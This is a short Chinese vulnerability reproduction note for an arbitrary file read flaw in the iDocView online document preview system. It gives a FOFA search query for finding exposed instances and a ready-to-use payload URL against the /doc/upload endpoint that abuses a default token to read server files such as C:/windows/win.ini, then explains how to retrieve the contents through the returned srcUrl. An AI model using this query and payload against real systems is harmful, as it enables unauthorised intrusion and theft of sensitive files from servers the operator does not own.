I4-2IDocView-在线文档解析应用-任意文件读取

漏洞描述：

iDocView是一个在线文档预览系统 /doc/upload 接口处存在任意文件读取漏洞，未授权的攻击者可以利用此接口并携带默认token读取服务器敏感文件信息，使系统处于极度不安全的状态。

网站图片:

网络测绘:

fofa语法：

FOFA：title==“在线文档预览 - I Doc View”

漏洞复现:

payload：

http://your-ip/doc/upload?token=testtoken&url=file:///C:/windows/win.ini&name=test.txt

效果图:

PS：访问srcUrl返回路径，即可读取文件内容